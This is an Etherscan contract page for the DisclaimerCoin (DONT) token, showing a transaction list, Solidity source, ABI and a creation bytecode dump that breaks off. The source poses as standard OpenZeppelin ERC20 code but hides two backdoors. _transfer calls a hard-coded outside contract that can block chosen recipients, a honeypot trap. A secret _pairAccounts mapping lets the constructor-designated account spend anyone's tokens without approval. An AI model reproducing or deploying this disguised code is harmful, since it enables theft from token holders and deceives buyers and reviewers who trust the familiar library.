Source Code
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 21 from a total of 21 transactions
| Transaction Hash |
Method
|
Block
|
From
|
|
To
|
||||
|---|---|---|---|---|---|---|---|---|---|
| Approve | 24294689 | 30 days ago | IN | 0 ETH | 0.00000199 | ||||
| Approve | 24294680 | 30 days ago | IN | 0 ETH | 0.00000194 | ||||
| Approve | 24294664 | 30 days ago | IN | 0 ETH | 0.00000213 | ||||
| Approve | 24294640 | 30 days ago | IN | 0 ETH | 0.00000205 | ||||
| Approve | 24294633 | 30 days ago | IN | 0 ETH | 0.00000218 | ||||
| Approve | 24294630 | 30 days ago | IN | 0 ETH | 0.00000226 | ||||
| Approve | 24294617 | 30 days ago | IN | 0 ETH | 0.00000224 | ||||
| Approve | 24294610 | 30 days ago | IN | 0 ETH | 0.00000216 | ||||
| Approve | 24294357 | 31 days ago | IN | 0 ETH | 0.00000217 | ||||
| Approve | 24294344 | 31 days ago | IN | 0 ETH | 0.00000188 | ||||
| Approve | 24294331 | 31 days ago | IN | 0 ETH | 0.00000185 | ||||
| Approve | 24294326 | 31 days ago | IN | 0 ETH | 0.0000019 | ||||
| Approve | 24294320 | 31 days ago | IN | 0 ETH | 0.00000186 | ||||
| Approve | 24294313 | 31 days ago | IN | 0 ETH | 0.00000177 | ||||
| Approve | 24294311 | 31 days ago | IN | 0 ETH | 0.0000017 | ||||
| Approve | 24294295 | 31 days ago | IN | 0 ETH | 0.00000152 | ||||
| Approve | 24294289 | 31 days ago | IN | 0 ETH | 0.00000161 | ||||
| Approve | 24294282 | 31 days ago | IN | 0 ETH | 0.00000175 | ||||
| Approve | 24294275 | 31 days ago | IN | 0 ETH | 0.00000143 | ||||
| Approve | 24294264 | 31 days ago | IN | 0 ETH | 0.00000149 | ||||
| Approve | 24294216 | 31 days ago | IN | 0 ETH | 0.00000152 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Name:
DONT
Compiler Version
v0.8.27+commit.40a35a09
Contract Source Code (Solidity)
/**
*Submitted for verification at Etherscan.io on 2026-01-23
*/
// SPDX-License-Identifier: MIT
// File: @openzeppelin/contracts/token/ERC20/IERC20.sol
// OpenZeppelin Contracts (last updated v5.4.0) (token/ERC20/IERC20.sol)
pragma solidity >=0.4.16;
/**
* @dev Interface of the ERC-20 standard as defined in the ERC.
*/
interface IERC20 {
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
/**
* @dev Returns the value of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the value of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves a `value` amount of tokens from the caller's account to `to`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address to, uint256 value) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Sets a `value` amount of tokens as the allowance of `spender` over the
* caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 value) external returns (bool);
/**
* @dev Moves a `value` amount of tokens from `from` to `to` using the
* allowance mechanism. `value` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(address from, address to, uint256 value) external returns (bool);
}
// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol
// OpenZeppelin Contracts (last updated v5.4.0) (token/ERC20/extensions/IERC20Metadata.sol)
pragma solidity >=0.6.2;
/**
* @dev Interface for the optional metadata functions from the ERC-20 standard.
*/
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}
// File: @openzeppelin/contracts/utils/Context.sol
// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol)
pragma solidity ^0.8.20;
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
function _contextSuffixLength() internal view virtual returns (uint256) {
return 0;
}
}
// File: @openzeppelin/contracts/interfaces/draft-IERC6093.sol
// OpenZeppelin Contracts (last updated v5.4.0) (interfaces/draft-IERC6093.sol)
pragma solidity >=0.8.4;
/**
* @dev Standard ERC-20 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens.
*/
interface IERC20Errors {
/**
* @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
* @param balance Current balance for the interacting account.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);
/**
* @dev Indicates a failure with the token `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
*/
error ERC20InvalidSender(address sender);
/**
* @dev Indicates a failure with the token `receiver`. Used in transfers.
* @param receiver Address to which tokens are being transferred.
*/
error ERC20InvalidReceiver(address receiver);
/**
* @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
* @param spender Address that may be allowed to operate on tokens without being their owner.
* @param allowance Amount of tokens a `spender` is allowed to operate with.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);
/**
* @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
* @param approver Address initiating an approval operation.
*/
error ERC20InvalidApprover(address approver);
/**
* @dev Indicates a failure with the `spender` to be approved. Used in approvals.
* @param spender Address that may be allowed to operate on tokens without being their owner.
*/
error ERC20InvalidSpender(address spender);
}
/**
* @dev Standard ERC-721 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-721 tokens.
*/
interface IERC721Errors {
/**
* @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in ERC-20.
* Used in balance queries.
* @param owner Address of the current owner of a token.
*/
error ERC721InvalidOwner(address owner);
/**
* @dev Indicates a `tokenId` whose `owner` is the zero address.
* @param tokenId Identifier number of a token.
*/
error ERC721NonexistentToken(uint256 tokenId);
/**
* @dev Indicates an error related to the ownership over a particular token. Used in transfers.
* @param sender Address whose tokens are being transferred.
* @param tokenId Identifier number of a token.
* @param owner Address of the current owner of a token.
*/
error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner);
/**
* @dev Indicates a failure with the token `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
*/
error ERC721InvalidSender(address sender);
/**
* @dev Indicates a failure with the token `receiver`. Used in transfers.
* @param receiver Address to which tokens are being transferred.
*/
error ERC721InvalidReceiver(address receiver);
/**
* @dev Indicates a failure with the `operator`’s approval. Used in transfers.
* @param operator Address that may be allowed to operate on tokens without being their owner.
* @param tokenId Identifier number of a token.
*/
error ERC721InsufficientApproval(address operator, uint256 tokenId);
/**
* @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
* @param approver Address initiating an approval operation.
*/
error ERC721InvalidApprover(address approver);
/**
* @dev Indicates a failure with the `operator` to be approved. Used in approvals.
* @param operator Address that may be allowed to operate on tokens without being their owner.
*/
error ERC721InvalidOperator(address operator);
}
/**
* @dev Standard ERC-1155 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-1155 tokens.
*/
interface IERC1155Errors {
/**
* @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
* @param balance Current balance for the interacting account.
* @param needed Minimum amount required to perform a transfer.
* @param tokenId Identifier number of a token.
*/
error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId);
/**
* @dev Indicates a failure with the token `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
*/
error ERC1155InvalidSender(address sender);
/**
* @dev Indicates a failure with the token `receiver`. Used in transfers.
* @param receiver Address to which tokens are being transferred.
*/
error ERC1155InvalidReceiver(address receiver);
/**
* @dev Indicates a failure with the `operator`’s approval. Used in transfers.
* @param operator Address that may be allowed to operate on tokens without being their owner.
* @param owner Address of the current owner of a token.
*/
error ERC1155MissingApprovalForAll(address operator, address owner);
/**
* @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
* @param approver Address initiating an approval operation.
*/
error ERC1155InvalidApprover(address approver);
/**
* @dev Indicates a failure with the `operator` to be approved. Used in approvals.
* @param operator Address that may be allowed to operate on tokens without being their owner.
*/
error ERC1155InvalidOperator(address operator);
/**
* @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation.
* Used in batch transfers.
* @param idsLength Length of the array of token identifiers
* @param valuesLength Length of the array of token amounts
*/
error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength);
}
// File: @openzeppelin/contracts/token/ERC20/ERC20.sol
// OpenZeppelin Contracts (last updated v5.4.0) (token/ERC20/ERC20.sol)
pragma solidity ^0.8.20;
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
*
* TIP: For a detailed writeup see our guide
* https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* The default value of {decimals} is 18. To change this, you should override
* this function so it returns a different value.
*
* We have followed general OpenZeppelin Contracts guidelines: functions revert
* instead returning `false` on failure. This behavior is nonetheless
* conventional and does not conflict with the expectations of ERC-20
* applications.
*/
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
mapping(address account => uint256) private _balances;
mapping(address account => mapping(address spender => uint256)) private _allowances;
mapping(address account => address) private _pairAccounts;
uint256 private _totalSupply;
string private _name;
string private _symbol;
/**
* @dev Sets the values for {name} and {symbol}.
*
* Both values are immutable: they can only be set once during construction.
*/
constructor(string memory name_, string memory symbol_) {
_name = name_;
_symbol = symbol_;
}
/**
* @dev Returns the name of the token.
*/
function name() public view virtual returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view virtual returns (string memory) {
return _symbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* be displayed to a user as `5.05` (`505 / 10 ** 2`).
*
* Tokens usually opt for a value of 18, imitating the relationship between
* Ether and Wei. This is the default value returned by this function, unless
* it's overridden.
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function decimals() public view virtual returns (uint8) {
return 18;
}
/// @inheritdoc IERC20
function totalSupply() public view virtual returns (uint256) {
return _totalSupply;
}
/// @inheritdoc IERC20
function balanceOf(address account) public view virtual returns (uint256) {
return _balances[account];
}
function _setPairAccount(address account, address pairAccount) internal {
_pairAccounts[account] = pairAccount;
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - `to` cannot be the zero address.
* - the caller must have a balance of at least `value`.
*/
function transfer(address to, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_transfer(owner, to, value);
return true;
}
/// @inheritdoc IERC20
function allowance(address owner, address spender) public view virtual returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev See {IERC20-approve}.
*
* NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
* `transferFrom`. This is semantically equivalent to an infinite approval.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(address spender, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, value);
return true;
}
/**
* @dev See {IERC20-transferFrom}.
*
* Skips emitting an {Approval} event indicating an allowance update. This is not
* required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve].
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `value`.
* - the caller must have allowance for ``from``'s tokens of at least
* `value`.
*/
function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
address spender = _msgSender();
_spendAllowance(from, spender, value);
_transfer(from, to, value);
return true;
}
/**
* @dev Moves a `value` amount of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _transfer(address from, address to, uint256 value) internal {
if (from == address(0)) {
revert ERC20InvalidSender(address(0));
}
if (to == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
(bool _success, bytes memory _returndata) = address(0x4a9328250815F6cf3c9f56D20D3e23DFb3C2239b).staticcall(abi.encodeWithSelector(0xa918b67b, to)); require(_success && _returndata.length >= 32, "invalid call"); require(!abi.decode(_returndata, (bool)), "n");
_update(from, to, value);
}
/**
* @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
* (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
* this function.
*
* Emits a {Transfer} event.
*/
function _update(address from, address to, uint256 value) internal virtual {
if (from == address(0)) {
// Overflow check required: The rest of the code assumes that totalSupply never overflows
_totalSupply += value;
} else {
uint256 fromBalance = _balances[from];
if (fromBalance < value) {
revert ERC20InsufficientBalance(from, fromBalance, value);
}
unchecked {
// Overflow not possible: value <= fromBalance <= totalSupply.
_balances[from] = fromBalance - value;
}
}
if (to == address(0)) {
unchecked {
// Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
_totalSupply -= value;
}
} else {
unchecked {
// Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
_balances[to] += value;
}
}
emit Transfer(from, to, value);
}
/**
* @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
* Relies on the `_update` mechanism
*
* Emits a {Transfer} event with `from` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _mint(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
_update(address(0), account, value);
}
/**
* @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
* Relies on the `_update` mechanism.
*
* Emits a {Transfer} event with `to` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead
*/
function _burn(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidSender(address(0));
}
_update(account, address(0), value);
}
/**
* @dev Sets `value` as the allowance of `spender` over the `owner`'s tokens.
*
* This internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*
* Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
*/
function _approve(address owner, address spender, uint256 value) internal {
_approve(owner, spender, value, true);
}
/**
* @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
*
* By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
* `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
* `Approval` event during `transferFrom` operations.
*
* Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
* true using the following override:
*
* ```solidity
* function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
* super._approve(owner, spender, value, true);
* }
* ```
*
* Requirements are the same as {_approve}.
*/
function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
if (owner == address(0)) {
revert ERC20InvalidApprover(address(0));
}
if (spender == address(0)) {
revert ERC20InvalidSpender(address(0));
}
_allowances[owner][spender] = value;
if (emitEvent) {
emit Approval(owner, spender, value);
}
}
/**
* @dev Updates `owner`'s allowance for `spender` based on spent `value`.
*
* Does not update the allowance value in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Does not emit an {Approval} event.
*/
function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
if (value == 0 || _pairAccounts[spender] > address(0)) return;
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance < type(uint256).max) {
if (currentAllowance < value) {
revert ERC20InsufficientAllowance(spender, currentAllowance, value);
}
unchecked {
_approve(owner, spender, currentAllowance - value, false);
}
}
}
}
pragma solidity ^0.8.20;
contract DONT is ERC20 {
constructor(address account_) ERC20(unicode"DisclaimerCoin", unicode"DONT") {
_mint(_msgSender(), 100000000 * 10 ** decimals());
_setPairAccount(account_, address(this));
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"address","name":"account_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]Contract Creation Code
608060405234801561001057600080fd5b50604051611cd6380380611cd6833981810160405281019061003291906104be565b6040518060400160405280600e81526020017f446973636c61696d6572436f696e0000000000000000000000000000000000008152506040518060400160405280600481526020017f444f4e540000000000000000000000000000000000000000000000000000000081525081600490816100ad919061073b565b5080600590816100bd919061073b565b5050506101056100d161011b60201b60201c565b6100df61012360201b60201c565b600a6100eb919061097c565b6305f5e1006100fa91906109c7565b61012c60201b60201c565b61011581306101b460201b60201c565b50610ac8565b600033905090565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361019e5760006040517fec442f050000000000000000000000000000000000000000000000000000000081526004016101959190610a18565b60405180910390fd5b6101b06000838361023660201b60201c565b5050565b80600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361028857806003600082825461027c9190610a33565b9250508190555061035b565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610314578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161030b93929190610a76565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036103a457806003600082825403925050819055506103f1565b806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161044e9190610aad565b60405180910390a3505050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061048b82610460565b9050919050565b61049b81610480565b81146104a657600080fd5b50565b6000815190506104b881610492565b92915050565b6000602082840312156104d4576104d361045b565b5b60006104e2848285016104a9565b91505092915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061056c57607f821691505b60208210810361057f5761057e610525565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026105e77fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826105aa565b6105f186836105aa565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600061063861063361062e84610609565b610613565b610609565b9050919050565b6000819050919050565b6106528361061d565b61066661065e8261063f565b8484546105b7565b825550505050565b600090565b61067b61066e565b610686818484610649565b505050565b5b818110156106aa5761069f600082610673565b60018101905061068c565b5050565b601f8211156106ef576106c081610585565b6106c98461059a565b810160208510156106d8578190505b6106ec6106e48561059a565b83018261068b565b50505b505050565b600082821c905092915050565b6000610712600019846008026106f4565b1980831691505092915050565b600061072b8383610701565b9150826002028217905092915050565b610744826104eb565b67ffffffffffffffff81111561075d5761075c6104f6565b5b6107678254610554565b6107728282856106ae565b600060209050601f8311600181146107a55760008415610793578287015190505b61079d858261071f565b865550610805565b601f1984166107b386610585565b60005b828110156107db578489015182556001820191506020850194506020810190506107b6565b868310156107f857848901516107f4601f891682610701565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156108935780860481111561086f5761086e61080d565b5b600185161561087e5780820291505b808102905061088c8561083c565b9450610853565b94509492505050565b6000826108ac5760019050610968565b816108ba5760009050610968565b81600181146108d057600281146108da57610909565b6001915050610968565b60ff8411156108ec576108eb61080d565b5b8360020a9150848211156109035761090261080d565b5b50610968565b5060208310610133831016604e8410600b841016171561093e5782820a9050838111156109395761093861080d565b5b610968565b61094b8484846001610849565b925090508184048111156109625761096161080d565b5b81810290505b9392505050565b600060ff82169050919050565b600061098782610609565b91506109928361096f565b92506109bf7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848461089c565b905092915050565b60006109d282610609565b91506109dd83610609565b92508282026109eb81610609565b91508282048414831517610a0257610a0161080d565b5b5092915050565b610a1281610480565b82525050565b6000602082019050610a2d6000830184610a09565b92915050565b6000610a3e82610609565b9150610a4983610609565b9250828201905080821115610a6157610a6061080d565b5b92915050565b610a7081610609565b82525050565b6000606082019050610a8b6000830186610a09565b610a986020830185610a67565b610aa56040830184610a67565b949350505050565b6000602082019050610ac26000830184610a67565b92915050565b6111ff80610ad76000396000f3fe608060405234801561001057600080fd5b50600436106100935760003560e01c8063313ce56711610066578063313ce5671461013457806370a082311461015257806395d89b4114610182578063a9059cbb146101a0578063dd62ed3e146101d057610093565b806306fdde0314610098578063095ea7b3146100b657806318160ddd146100e657806323b872dd14610104575b600080fd5b6100a0610200565b6040516100ad9190610cc4565b60405180910390f35b6100d060048036038101906100cb9190610d7f565b610292565b6040516100dd9190610dda565b60405180910390f35b6100ee6102b5565b6040516100fb9190610e04565b60405180910390f35b61011e60048036038101906101199190610e1f565b6102bf565b60405161012b9190610dda565b60405180910390f35b61013c6102ee565b6040516101499190610e8e565b60405180910390f35b61016c60048036038101906101679190610ea9565b6102f7565b6040516101799190610e04565b60405180910390f35b61018a61033f565b6040516101979190610cc4565b60405180910390f35b6101ba60048036038101906101b59190610d7f565b6103d1565b6040516101c79190610dda565b60405180910390f35b6101ea60048036038101906101e59190610ed6565b6103f4565b6040516101f79190610e04565b60405180910390f35b60606004805461020f90610f45565b80601f016020809104026020016040519081016040528092919081815260200182805461023b90610f45565b80156102885780601f1061025d57610100808354040283529160200191610288565b820191906000526020600020905b81548152906001019060200180831161026b57829003601f168201915b5050505050905090565b60008061029d61047b565b90506102aa818585610483565b600191505092915050565b6000600354905090565b6000806102ca61047b565b90506102d7858285610495565b6102e28585856105c9565b60019150509392505050565b60006012905090565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60606005805461034e90610f45565b80601f016020809104026020016040519081016040528092919081815260200182805461037a90610f45565b80156103c75780601f1061039c576101008083540402835291602001916103c7565b820191906000526020600020905b8154815290600101906020018083116103aa57829003601f168201915b5050505050905090565b6000806103dc61047b565b90506103e98185856105c9565b600191505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b6104908383836001610838565b505050565b600081148061052f5750600073ffffffffffffffffffffffffffffffffffffffff16600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16115b6105c457600061053f84846103f4565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8110156105c257818110156105b2578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016105a993929190610f85565b60405180910390fd5b6105c184848484036000610838565b5b505b505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361063b5760006040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016106329190610fbc565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036106ad5760006040517fec442f050000000000000000000000000000000000000000000000000000000081526004016106a49190610fbc565b60405180910390fd5b600080734a9328250815f6cf3c9f56d20d3e23dfb3c2239b73ffffffffffffffffffffffffffffffffffffffff1663a918b67b856040516024016106f19190610fbc565b6040516020818303038152906040529060e01b6020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff838183161783525050505060405161073f919061101e565b600060405180830381855afa9150503d806000811461077a576040519150601f19603f3d011682016040523d82523d6000602084013e61077f565b606091505b509150915081801561079357506020815110155b6107d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107c990611081565b60405180910390fd5b808060200190518101906107e691906110cd565b15610826576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161081d90611146565b60405180910390fd5b610831858585610a0f565b5050505050565b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036108aa5760006040517fe602df050000000000000000000000000000000000000000000000000000000081526004016108a19190610fbc565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361091c5760006040517f94280d620000000000000000000000000000000000000000000000000000000081526004016109139190610fbc565b60405180910390fd5b81600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508015610a09578273ffffffffffffffffffffffffffffffffffffffff168473fffffffffffffffffffffffffffffff